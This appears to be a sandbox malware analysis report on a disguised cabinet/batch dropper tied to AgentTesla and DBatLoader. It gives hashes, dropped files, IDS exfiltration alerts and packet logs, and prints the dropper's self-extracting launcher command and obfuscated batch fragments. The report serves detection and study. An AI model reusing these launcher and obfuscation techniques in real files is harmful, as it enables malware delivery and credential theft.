                                                                        • 50.116.93.185
                                                                        Order Specifications for Materials.docx.vbsGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 50.116.93.185
                                                                        https://mailhotcmhakamloops.wordpress.com/Get hashmaliciousUnknownBrowse
                                                                        • 69.49.230.198
                                                                        EVER ABILITY V66 PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 50.87.144.157
                                                                        MV. NORDRHONE VSL's PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 50.87.144.157
                                                                        MUM - VESSEL'S PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 50.87.144.157
                                                                        Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                                                        • 69.49.245.172
                                                                        Oakville_Service_Update_d76b33a1-3420-40be-babd-e82e253ad25c.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                        • 192.185.12.205
                                                                        http://dcrealestateclasses.com/sirmy359ka/logfds65475mnvn/0Px7KgmP2ER6zsKKoRahD/ZGFuaWVscGxvdHRlbEBxdWFudGV4YS5jb20=Get hashmaliciousUnknownBrowse
                                                                        • 192.185.13.169
                                                                        https://docs.google.com/drawings/d/1OzqwiA1nI8GUoiKob_qJY5xL1HmGK6VrRXlYUDuD68w/preview?pli=1JXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlGet hashmaliciousMamba2FABrowse
                                                                        • 108.179.193.4
                                                                        CLOUDFLARENETUSna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.114.96.3
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.114.96.3
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.114.96.3
                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                        • 172.67.154.67
                                                                        PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                        • 104.21.74.191
                                                                        ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 188.114.97.3
                                                                        File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 188.114.96.3
                                                                        Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 188.114.96.3

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0egreatthingswithmegood.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                        • 172.67.74.152
                                                                        file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                        • 172.67.74.152
                                                                        Reff_Yazaki-europe_575810710108_ZnjKTIejsM.htmlGet hashmaliciousUnknownBrowse
                                                                        • 172.67.74.152
                                                                        ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 172.67.74.152
                                                                        File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 172.67.74.152
                                                                        Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 172.67.74.152
                                                                        Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 172.67.74.152
                                                                        Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 172.67.74.152
                                                                        Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 172.67.74.152
                                                                        Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 172.67.74.152
                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                        • 50.116.93.185
                                                                        Orden de Compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 50.116.93.185
                                                                        Orden de compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 50.116.93.185
                                                                        z1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 50.116.93.185
                                                                        Order pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 50.116.93.185
                                                                        Proforma Fatura ektedir.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 50.116.93.185
                                                                        PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                        • 50.116.93.185
                                                                        Order Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                        • 50.116.93.185
                                                                        Transferencia.xlsGet hashmaliciousUnknownBrowse
                                                                        • 50.116.93.185
                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                        • 50.116.93.185

                                                                        Dropped Files

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\Public\Libraries\xrbjyllC.pifz1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          Order Specifications for Materials.docx.vbsGet hashmaliciousDBatLoader, FormBookBrowse
                                                                            Payment.cmdGet hashmaliciousAzorult, DBatLoaderBrowse
                                                                              ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                  Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                                                                                    Confirmation.docx.exeGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                      ZG7UaFRPVW.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                        IN-34823_PO39276-pdf.vbeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                          7XU2cRFInT.exeGet hashmaliciousRemcos, DBatLoaderBrowse

                                                                                            Created / dropped Files

                                                                                            C:\Users\Public\Cllyjbrx.url

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF">), ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):104
                                                                                            Entropy (8bit):5.1375037811797055
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMwysbx50K9Dovn:HRYFVmTWDyzUExqK0v
                                                                                            MD5:E9DEFC5F517D7E26B9398584079F580C
                                                                                            SHA1:BE4C94E82E6215DEBB6BBE83193681518D197FEE
                                                                                            SHA-256:857F6D8793545669B1DA61A916D1AA73DB9ABB66FA6769E0961DEC622791BA20
                                                                                            SHA-512:5D9F0B2AB7C83A26C5AFC52A655F2F243C12E5983A27730192A15923DD7E6812FD28EFC121E58D18750BBC509193CEC3DBB8FE4E1FD3E150775B2C1B2DB7ED5D
                                                                                            Malicious:true
                                                                                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF"..IconIndex=963148..HotKey=28..

                                                                                            C:\Users\Public\Libraries\Cllyjbrx.PIF

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1138688
                                                                                            Entropy (8bit):6.826651927142877
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:+VL/y4HWMvHg4VLerA+EYyx9XXIDT8Jf3pbV13Jks:Q6MPPRlPXI8t5X
                                                                                            MD5:08C4AFC4A714EDFE9F2554B72DA40A04
                                                                                            SHA1:C5BF192E4258D42C359504997FDDAB6BF812E2F9
                                                                                            SHA-256:64E1D81708B22A034F42FEE4DCDDB6B90A191A0F1B0A2754E8F82A1723675AB5
                                                                                            SHA-512:90429C5FB34744C51942430A40AFCFF2DA83D569D6570C52801A07B97C02DA4B759973EA495AC8B78F38FD4B6120858B4FAF8D5ED7C964FB8731CCF52950D3DD
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 32%
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................L.......(.......0....@..............................................@...............................'...`...........................l..................................................T...(............................text...d........................... ..`.itext..L.... ...................... ..`.data....%...0...&..................@....bss.....6...`.......:...................idata...'.......(...:..............@....tls....4............b...................rdata...............b..............@..@.reloc...l.......n...d..............@..B.rsrc........`......................@..@.....................`..............@..@................................................................................................

                                                                                            C:\Users\Public\Libraries\PNO

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4
                                                                                            Entropy (8bit):2.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:9v:N
                                                                                            MD5:FFED080BF0C3B454B4D2873AF298511E
                                                                                            SHA1:33B86DCB41B307CE92537C42466B3AC65FA75340
                                                                                            SHA-256:2B3275E2630092BE620791E92F0B2D759BA133346CE66FEE677F3EFF5A23D48E
                                                                                            SHA-512:A89E385BA8AC683AEE84712658C90F30EA6AE6E10021D971AA616A3D417F78AEB14FF627A316403F4922AA80F6729DB0AC522FEAC906413EAD9800372411E755
                                                                                            Malicious:false
                                                                                            Preview:87..

                                                                                            C:\Users\Public\Libraries\xrbjyllC.cmd

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                            File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):62357
                                                                                            Entropy (8bit):4.705712327109906
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                            MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                            SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                            SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                            SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                            Malicious:false
                                                                                            Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                            C:\Users\Public\Libraries\xrbjyllC.pif

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):68096
                                                                                            Entropy (8bit):6.328046551801531
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                            MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                            SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                            SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                            SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: z1SWIFT_MT103_Payment_552016_cmd.bat, Detection: malicious, Browse
                                                                                            • Filename: Order Specifications for Materials.docx.vbs, Detection: malicious, Browse
                                                                                            • Filename: Payment.cmd, Detection: malicious, Browse
                                                                                            • Filename: ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd, Detection: malicious, Browse
                                                                                            • Filename: ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd, Detection: malicious, Browse
                                                                                            • Filename: Julcbozqsvtzlo.cmd, Detection: malicious, Browse
                                                                                            • Filename: Confirmation.docx.exe, Detection: malicious, Browse
                                                                                            • Filename: ZG7UaFRPVW.exe, Detection: malicious, Browse
                                                                                            • Filename: IN-34823_PO39276-pdf.vbe, Detection: malicious, Browse
                                                                                            • Filename: 7XU2cRFInT.exe, Detection: malicious, Browse
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                            C:\Users\Public\alpha.pif

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):236544
                                                                                            Entropy (8bit):6.4416694948877025
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                            MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                            SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                            SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\x.exe

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\extrac32.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1138688
                                                                                            Entropy (8bit):6.826651927142877
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:+VL/y4HWMvHg4VLerA+EYyx9XXIDT8Jf3pbV13Jks:Q6MPPRlPXI8t5X
                                                                                            MD5:08C4AFC4A714EDFE9F2554B72DA40A04
                                                                                            SHA1:C5BF192E4258D42C359504997FDDAB6BF812E2F9
                                                                                            SHA-256:64E1D81708B22A034F42FEE4DCDDB6B90A191A0F1B0A2754E8F82A1723675AB5
                                                                                            SHA-512:90429C5FB34744C51942430A40AFCFF2DA83D569D6570C52801A07B97C02DA4B759973EA495AC8B78F38FD4B6120858B4FAF8D5ED7C964FB8731CCF52950D3DD
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 32%
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................L.......(.......0....@..............................................@...............................'...`...........................l..................................................T...(............................text...d........................... ..`.itext..L.... ...................... ..`.data....%...0...&..................@....bss.....6...`.......:...................idata...'.......(...:..............@....tls....4............b...................rdata...............b..............@..@.reloc...l.......n...d..............@..B.rsrc........`......................@..@.....................`..............@..@................................................................................................

                                                                                            C:\Users\user\AppData\Roaming\sgxIb\Loader.Log

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):244
                                                                                            Entropy (8bit):4.61658696146199
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:+MrRJNpw1UDajMyc0ohRJNpw1UDajMyc0ov:pRJjEUDtyc0ohRJjEUDtyc0ov
                                                                                            MD5:43429641FC18329AA43C377CA931E2CC
                                                                                            SHA1:A8123D641DC6B48F1B7601449A62BEE33BFDFEDA
                                                                                            SHA-256:1B885BD7265A6C07E59D16DE6CF05575F47BDF6592C145DD6D369CE5C2976C80
                                                                                            SHA-512:712DE502033CACB9A40728DA554D36F72E3E152815903FDCE9C5A3F818E3362A91761DAFEA5D97F8130605E272580010632D45CFE466383E1945F76C56E8F0AC
                                                                                            Malicious:false
                                                                                            Preview:24-10-30.0335: Mercury/32 Loader Started..24-10-30.0335: Loader encountered Windows error 2 creating Mercury/32 process...24-10-30.0335: Mercury/32 Loader Started..24-10-30.0335: Loader encountered Windows error 2 creating Mercury/32 process...

                                                                                            C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                                                                                            Download File
                                                                                            Process:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:modified
                                                                                            Size (bytes):68096
                                                                                            Entropy (8bit):6.328046551801531
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                            MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                            SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                            SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                            SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                            \Device\ConDrv

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):592
                                                                                            Entropy (8bit):4.621396330050296
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:qbf/xTzaeSbZ7u0wxDDDDDDDDjCaY5aAaYAUATB8NGNe:Kf/xTzap7u0wQakaAaCAt8NR
                                                                                            MD5:343E954129C332E60D8F9B55145CA365
                                                                                            SHA1:F8C444B41CE20EA1C82A14248F3A06C4425BDD50
                                                                                            SHA-256:89A065092A8F23911A56253F3A01ABF3E3109C5523E8ACDD20070FE3C221A243
                                                                                            SHA-512:2DCCDF988DACC262D2F4A9178E169125DB119A2E24E2A0B15980F4DE3B42417A7B4FD5013CFF9E560AA5D0960FA1D5C705233C45F9E7FA7D25E01195D2706BD4
                                                                                            Malicious:false
                                                                                            Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x116000 (1138688) (1 MB)....Total bytes written = 0x116000 (1138688) (1 MB).......Operation completed successfully in 0.109 seconds.....

                                                                                            \Device\Null

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):564
                                                                                            Entropy (8bit):4.558269873549125
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:q6pLExT6ceSbZ7u0wxDDDDDDDDjCaY5n4aYAWS4TB8NGNv:/pLExT6cp7u0wQakn4al4t8NC
                                                                                            MD5:A6FADC7AC568000B6EBB2798B26B2747
                                                                                            SHA1:8AE2FC2A2AF6E8D45E04D55E7A0EF80CD1452C05
                                                                                            SHA-256:CE127301AD198410E2CEA6A5F94C859AAFDE68A823437C5E6F6741FA08AF2447
                                                                                            SHA-512:DE460139ED47702EADEA6E45C9066FC0FE3DD20ADD94BF9A86F1EC2FDF2569D56BF62153155E28BFE983603B988FB596FCC0B3A7ED6ABC13E98748E02CEDBD18
                                                                                            Malicious:false
                                                                                            Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\cmd.exe...Destination File: C:\\Users\\Public\\alpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x39c00 (236544) (0 MB)....Total bytes written = 0x3a000 (237568) (0 MB).......Operation completed successfully in 0.63 seconds.....

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 35 datablocks, 0 compression
                                                                                            Entropy (8bit):6.826154747459283
                                                                                            TrID:
                                                                                            • Microsoft Cabinet Archive (8008/1) 99.91%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                                                            File name:z1Transaction_ID_REF2418_cmd.bat
                                                                                            File size:1'139'107 bytes
                                                                                            MD5:597443c0b1405f3deaa48eef7de516c4
                                                                                            SHA1:8f3688a384a9a8c8f70fc6a19382d73fbded0674
                                                                                            SHA256:553f1b4f0532c10e855e349a79d51c1fbffe6f9e03360e50b1445b82d1667ebb
                                                                                            SHA512:144d0c1f836950900520ae4f57156a924d657dc7107a79de982e02b732c91d8fdf307dcc675c6440683e307e397d63abb134c5dc0440765db0dfe99e1e91911f
                                                                                            SSDEEP:24576:MhL/ykHKM7D84Vz6rcC4Qy19XbMDX8VP3lvV13FQs:maMvj5N7bMY51b
                                                                                            TLSH:6D35AE2A75C09631E172027A6B079BD8861D3D313E24606FBDF55F3CEA316583E25EA3
                                                                                            File Content Preview:MSCF............u.......................#.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".....`............ .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und

                                                                                            File Icon

                                                                                            Icon Hash:9686878b929a9886

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-10-30T08:35:22.962696+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449744110.4.45.19721TCP
                                                                                            2024-10-30T08:35:23.900856+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449747110.4.45.19754601TCP
                                                                                            2024-10-30T08:35:23.907031+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449747110.4.45.19754601TCP
                                                                                            2024-10-30T08:35:39.357736+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449753110.4.45.19721TCP
                                                                                            2024-10-30T08:35:40.260221+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449754110.4.45.19763940TCP
                                                                                            2024-10-30T08:35:40.266852+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449754110.4.45.19763940TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 30, 2024 08:34:58.002439022 CET49730443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:58.002479076 CET4434973050.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:58.002557993 CET49730443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:58.002770901 CET49730443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:58.002818108 CET4434973050.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:58.002873898 CET49730443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:58.050447941 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:58.050496101 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:58.050565958 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:58.055082083 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:58.055098057 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:58.739486933 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:58.739557981 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:58.804135084 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:58.804176092 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:58.804954052 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:58.856123924 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.235292912 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.279337883 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.398030043 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.398055077 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.398061991 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.398158073 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.398171902 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.448137045 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.516011000 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.516033888 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.516078949 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.516128063 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.516161919 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.516810894 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.516819954 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.516877890 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.516895056 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.518388033 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.518398046 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.518469095 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.548598051 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.548612118 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.548731089 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.634876966 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.634973049 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.635755062 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.635822058 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.636603117 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.636674881 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.637105942 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.637171030 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.638011932 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.638097048 CET49731443192.168.2.450.116.93.185
